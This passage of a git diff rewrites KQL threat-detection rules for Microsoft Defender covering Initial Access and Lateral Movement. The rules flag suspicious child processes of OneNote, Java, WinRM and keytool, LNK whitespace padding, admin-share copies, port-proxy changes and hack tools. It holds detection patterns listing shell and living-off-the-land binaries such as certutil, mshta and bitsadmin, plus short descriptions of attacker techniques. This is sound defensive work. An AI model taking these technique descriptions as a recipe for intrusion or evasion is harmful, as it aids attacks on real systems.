attack.g0032 - -DeviceProcessEvents +// Title: Suspicious HWP Sub Processes +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-24 +// Level: high +// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032 + +DeviceProcessEvents | where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql index 40924da6..d7d713a9 100644 --- a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql +++ b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql @@ -1,13 +1,13 @@ -// Title: Suspicious LNK Command-Line Padding with Whitespace Characters -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-03-19 -// Level: high -// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). -// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. -// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. -// This rule flags suspicious use of such padding observed in real-world attacks. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1204.002 - -DeviceProcessEvents +// Title: Suspicious LNK Command-Line Padding with Whitespace Characters +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-03-19 +// Level: high +// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). +// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. +// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. +// This rule flags suspicious use of such padding observed in real-world attacks. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1204.002 + +DeviceProcessEvents | where ((ProcessCommandLine contains " " or ProcessCommandLine contains "\\u0009" or ProcessCommandLine contains "\\u000A" or ProcessCommandLine contains "\\u0011" or ProcessCommandLine contains "\\u0012" or ProcessCommandLine contains "\\u0013" or ProcessCommandLine contains "\\u000B" or ProcessCommandLine contains "\\u000C" or ProcessCommandLine contains "\\u000D") or ProcessCommandLine matches regex "\\n\\n\\n\\n\\n\\n") and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessCommandLine contains ".lnk") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql index 4345d426..558923be 100644 --- a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql +++ b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Microsoft OneNote Child Process -// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) -// Date: 2022-10-21 -// Level: high -// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. -// MITRE Tactic: Initial Access -// Tags: attack.t1566, attack.t1566.001, attack.initial-access -// False Positives: -// - File located in the AppData folder with trusted signature - -DeviceProcessEvents +// Title: Suspicious Microsoft OneNote Child Process +// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) +// Date: 2022-10-21 +// Level: high +// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. +// MITRE Tactic: Initial Access +// Tags: attack.t1566, attack.t1566.001, attack.initial-access +// False Positives: +// - File located in the AppData folder with trusted signature + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe")))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql index 81f89dcd..e945ae3a 100644 --- a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql +++ b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql @@ -1,10 +1,10 @@ -// Title: Suspicious MSExchangeMailboxReplication ASPX Write -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-25 -// Level: high -// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 - -DeviceFileEvents +// Title: Suspicious MSExchangeMailboxReplication ASPX Write +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql index a82d0bcd..0c007948 100644 --- a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql +++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Processes Spawned by Java.EXE -// Author: Andreas Hunkeler (@Karneades), Florian Roth -// Date: 2021-12-17 -// Level: high -// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation -// False Positives: -// - Legitimate calls to system binaries -// - Company specific internal usage - -DeviceProcessEvents +// Title: Suspicious Processes Spawned by Java.EXE +// Author: Andreas Hunkeler (@Karneades), Florian Roth +// Date: 2021-12-17 +// Level: high +// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate calls to system binaries +// - Company specific internal usage + +DeviceProcessEvents | where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql index b7e7d5e8..2e57a8e9 100644 --- a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql +++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Processes Spawned by WinRM -// Author: Andreas Hunkeler (@Karneades), Markus Neis -// Date: 2021-05-20 -// Level: high -// Description: Detects suspicious processes including shells spawnd from WinRM host process -// MITRE Tactic: Initial Access -// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation -// False Positives: -// - Legitimate WinRM usage - -DeviceProcessEvents +// Title: Suspicious Processes Spawned by WinRM +// Author: Andreas Hunkeler (@Karneades), Markus Neis +// Date: 2021-05-20 +// Level: high +// Description: Detects suspicious processes including shells spawnd from WinRM host process +// MITRE Tactic: Initial Access +// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate WinRM usage + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql index affdbcc2..436716d6 100644 --- a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql +++ b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Shells Spawn by Java Utility Keytool -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021-12-22 -// Level: high -// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation - -DeviceProcessEvents +// Title: Suspicious Shells Spawn by Java Utility Keytool +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-12-22 +// Level: high +// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/terminal_service_process_spawn.kql b/KQL/rules/Initial Access/terminal_service_process_spawn.kql index 57da8f94..1c04ad35 100644 --- a/KQL/rules/Initial Access/terminal_service_process_spawn.kql +++ b/KQL/rules/Initial Access/terminal_service_process_spawn.kql @@ -1,10 +1,10 @@ -// Title: Terminal Service Process Spawn -// Author: Florian Roth (Nextron Systems) -// Date: 2019-05-22 -// Level: high -// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002 - -DeviceProcessEvents +// Title: Terminal Service Process Spawn +// Author: Florian Roth (Nextron Systems) +// Date: 2019-05-22 +// Level: high +// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002 + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql index 6bdfddf3..8ba2f5e3 100644 --- a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql +++ b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql @@ -1,12 +1,12 @@ -// Title: User Added to Remote Desktop Users Group -// Author: Florian Roth (Nextron Systems) -// Date: 2021-12-06 -// Level: high -// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: User Added to Remote Desktop Users Group +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-06 +// Level: high +// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql index 462a905a..5e5f7158 100644 --- a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql +++ b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql @@ -1,12 +1,12 @@ -// Title: Windows Registry Trust Record Modification -// Author: Antonlovesdnb, Trent Liffick (@tliffick) -// Date: 2020-02-19 -// Level: medium -// Description: Alerts on trust record modification within the registry, indicating usage of macros -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - This will alert on legitimate macro usage as well, additional tuning is required - -DeviceRegistryEvents +// Title: Windows Registry Trust Record Modification +// Author: Antonlovesdnb, Trent Liffick (@tliffick) +// Date: 2020-02-19 +// Level: medium +// Description: Alerts on trust record modification within the registry, indicating usage of macros +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - This will alert on legitimate macro usage as well, additional tuning is required + +DeviceRegistryEvents | where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql index 84ea4948..10174710 100644 --- a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql +++ b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql @@ -1,12 +1,12 @@ -// Title: Copy From Or To Admin Share Or Sysvol Folder -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019-12-30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -// False Positives: -// - Administrative scripts - -DeviceProcessEvents +// Title: Copy From Or To Admin Share Or Sysvol Folder +// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali +// Date: 2019-12-30 +// Level: medium +// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains " move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell_ise.exe" or FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql index 2374defc..d6473d29 100644 --- a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql +++ b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpMove Tool Execution -// Author: Luca Di Bartolomeo (CrimpSec) -// Date: 2024-01-29 -// Level: high -// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.002 - -DeviceProcessEvents +// Title: HackTool - SharpMove Tool Execution +// Author: Luca Di Bartolomeo (CrimpSec) +// Date: 2024-01-29 +// Level: high +// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 + +DeviceProcessEvents | where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql index 338ee2a6..3d84e596 100644 --- a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql +++ b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql @@ -1,10 +1,10 @@ -// Title: HackTool - WinRM Access Via Evil-WinRM -// Author: frack113 -// Date: 2022-01-07 -// Level: medium -// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.006 - -DeviceProcessEvents +// Title: HackTool - WinRM Access Via Evil-WinRM +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.006 + +DeviceProcessEvents | where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql index 27dfae8a..5d7b1685 100644 --- a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql +++ b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql @@ -1,10 +1,10 @@ -// Title: MMC Spawning Windows Shell -// Author: Karneades, Swisscom CSIRT -// Date: 2019-08-05 -// Level: high -// Description: Detects a Windows command line executable started from MMC -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1021.003 - -DeviceProcessEvents +// Title: MMC Spawning Windows Shell +// Author: Karneades, Swisscom CSIRT +// Date: 2019-08-05 +// Level: high +// Description: Detects a Windows command line executable started from MMC +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql index 92aa7343..2f6bda36 100644 --- a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql +++ b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql @@ -1,12 +1,12 @@ -// Title: Mstsc.EXE Execution From Uncommon Parent -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-18 -// Level: high -// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Mstsc.EXE Execution From Uncommon Parent +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql index 8e079b84..60d05d82 100644 --- a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql +++ b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql @@ -1,13 +1,13 @@ -// Title: New Port Forwarding Rule Added Via Netsh.EXE -// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel -// Date: 2019-01-29 -// Level: medium -// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate administration activity -// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) - -DeviceProcessEvents +// Title: New Port Forwarding Rule Added Via Netsh.EXE +// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel +// Date: 2019-01-29 +// Level: medium +// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activity +// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) + +DeviceProcessEvents | where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c=")) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql index 0804f14d..0827a45a 100644 --- a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql +++ b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql @@ -1,13 +1,13 @@ -// Title: New PortProxy Registry Entry Added -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021-06-22 -// Level: medium -// Description: Detects the modification of the PortProxy registry key which is used for port forwarding. -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, 